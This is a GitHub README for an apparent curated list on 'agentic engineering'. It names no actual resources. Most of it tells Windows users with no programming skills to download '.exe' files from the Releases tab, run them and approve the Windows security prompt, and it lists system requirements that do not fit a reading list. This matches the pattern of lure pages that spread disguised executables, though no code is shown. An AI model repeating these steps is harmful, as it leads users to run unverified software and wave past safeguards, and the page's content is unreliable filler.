awesome-agentic-engineering
Provide a curated list of tools, resources, and best practices for adopting AI-driven autonomous software development with agentic engineering.
Description
Provide a curated list of tools, resources, and best practices for adopting AI-driven autonomous software development with agentic engineering.
README
This project is a carefully selected list of useful resources for agentic engineering. Agentic engineering means designing software that can act on its own ideas without constant human help. This list includes tools, guides, and studies that help users understand and build smarter AI systems.
You don't need any programming skills to use these resources. The goal is to make complex ideas easy to access for curious minds and learners.
This guide will help you get the software and resources on your Windows computer. Follow each step carefully. You donβt need to be an expert to complete this.
To run the resources comfortably on your Windows PC, you should have:
- Windows 10 or later
- 4 GB of free disk space
- 8 GB of RAM or more recommended for large files
- Internet connection to download files and updates
You will use the main project page to get all materials. This page gathers the files, links, and instructions you will need.
Click this big button to go to the project page where you can download files and view available resources:
This link brings you to the GitHub page where you will find all the materials organized neatly.
Once on the page, look for a section called Releases, Assets, or directly browse the repository files. The most relevant files or collections are usually in the "Releases" tab or the main file area.
You may find documents, tool links, and sometimes downloadable software or scripts related to agentic engineering. Most files are for reading or learning.
Click on any file or resource that you want to download. For large collections or tools, there will be an obvious download button or link labeled .zip or .exe.
Save the file to a folder you can find easily, like your Downloads folder or your Desktop.
- If you downloaded a document (e.g., PDF or TXT), double-click the file to open it.
- If you downloaded a zipped folder, right-click and select "Extract All" to unpack the contents.
- If the file is a program with
.exeextension, double-click to run it. Windows might ask you to approve the software; choose "Yes" to continue.
Since this repository focuses on resources rather than a single app, many downloads will be guides and tools you can study and try out.
This collection connects you to various materials related to agentic engineering. These include:
- Tutorials to explain how agentic systems work
- Tools to help build and test smart AI
- Code examples in simple formats (even if you don't know coding)
- Links to research papers and explanations
- Lists of developer tools and AI coding aides
You can read through guides and try out free tools designed for beginners.
- Learn how AI agents act independently in software
- Understand basic AI programming concepts without coding
- Find tools to generate or manage AI projects
- See real examples of AI applications that can work on their own
- Keep updated on new advancements in agentic engineering
- Keep your Windows system up to date.
- Back up files you download to avoid losing work.
- Use a stable internet connection for large downloads.
- Take your time reading guides before trying tools.
- Join community discussions on GitHub for help or sharing ideas.
If you run into issues:
- Check your internet connection.
- Make sure you have enough disk space.
- Restart your computer before rerunning installations.
- Consult the GitHub pageβs Issues tab to see if others had the same problem.
- You can leave questions there for the community or maintainers to answer.
This project relates to topics like:
- Agentic engineering
- AI coding support
- Developer tools for AI
- Large Language Models (LLMs)
- Practical AI learning
These keywords can guide your exploration on GitHub and other sites.
If you browse the repository files directly, expect folders like:
- docs/ β Guidebooks and tutorials
- tools/ β Helpful applications or scripts
- examples/ β Sample projects or code snippets
- research/ β Papers and articles
You can open these in your browser or download them for offline use.
Besides the project page, you might find related articles and tools by searching for "agentic engineering resources" or visiting AI-focused websites and forums.
